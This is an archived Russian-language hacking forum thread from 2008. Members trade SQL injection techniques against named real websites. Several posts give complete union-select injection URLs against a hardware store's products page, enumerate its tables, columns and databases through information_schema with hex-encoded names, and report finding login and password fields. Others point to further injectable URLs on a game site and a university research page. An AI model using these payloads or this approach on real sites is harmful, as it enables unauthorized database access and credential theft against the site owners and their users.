ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

24.04.2008, 19:09
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме: 7192869
Репутация:
3033
|
|
Велемир из твоего поста понял процентов 10, а вообще:
А запрос похожий видел такой :
-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--
такого запроса ты видеть не мог, т.к он нарушает синтаксис, очевидно login_id должно быть в hex либо к кавычках при маджик_квотс_гпс= Офф
И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.
column_name+from+information_schema.columns+where+ table_name=hex(что -то)
Врят ли это колличество полей в таблице xD, видмо просто принтабельные колонки
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|

24.04.2008, 19:27
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Ну а почему тогда tbmember,tblogin не существуют - это не таблицы чтоли ?(.
Кстати, если выполнить как ты сказал hex(abrakadabra), где абракадабра - имя таблицы,то вернёт 'Item comming soon',а если выполнить запрос сразу *хексанутый*, то выведет :
http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C5F70686F74 6F67616C6C657279--
0x74626C5F70686F746F67616C6C657279 - это tbl_photogallery.
P.S: При запросе http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C6F67696E-- ,где
0x74626C6F67696E - это tbmember, вернуло поля
login_id,login,password,user_name,access_level
Но при запросе
http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,user_name,4+from+tblogin--
Выдаёт,что таблица не найдена. Как тут быть ?( В Hex пробывал
Последний раз редактировалось Велемир; 24.04.2008 в 19:43..
|
|
|

24.04.2008, 20:07
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Велемир
Когда ты прочитаешь хоть одну статью по скулям?
Эта таблица в другой базе
И предполагая твой следующий вопрос:
база test_sql
Вот вывод всех баз:
_http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,schema_name,3+from+information_ schema.schemata--
Последний раз редактировалось jokester; 24.04.2008 в 20:12..
|
|
|

24.04.2008, 22:16
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме: 3941248
Репутация:
668
|
|
эньекция? http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=-1
|
|
|

24.04.2008, 22:48
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
не так выразился ..
Последний раз редактировалось 159932; 25.04.2008 в 16:43..
Причина: не так выразился ..
|
|
|

25.04.2008, 11:00
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
159932, и что по твоему в этом странного?
|
|
|

25.04.2008, 11:18
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме: 3660186
Репутация:
905
|
|
159932, http://ru2.php.net/manual/ru/book.mssql.php
|
|
|

25.04.2008, 11:35
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
гг, вот что действительно странно
Spyder (17:17:53 12/03/2008)
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in /bigdisk/www/html/research/alcator/program/cmod_runs.php on line 119
Spyder (17:18:07 12/03/2008)
меня глючит или это мсскл на линухе?
ettee (17:19:30 12/03/2008)
ой,спудер...
ettee (17:19:32 12/03/2008)
ом
ettee (17:19:37 12/03/2008)
наебывают?
Spyder (17:19:40 12/03/2008)
я хз
Spyder (17:20:37 12/03/2008)
http://www.psfc.mit.edu/research/alcator/program/cmod_runs.php?run=1050525'
|
|
|

25.04.2008, 11:40
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
Сообщение от GrAmOzEkA
это значит system отключено, юзай include
поржал)
Последний раз редактировалось Spyder; 25.04.2008 в 11:42..
|
|
|

25.04.2008, 11:46
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Spyder, mssql может быть удаленно расположенной бд
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|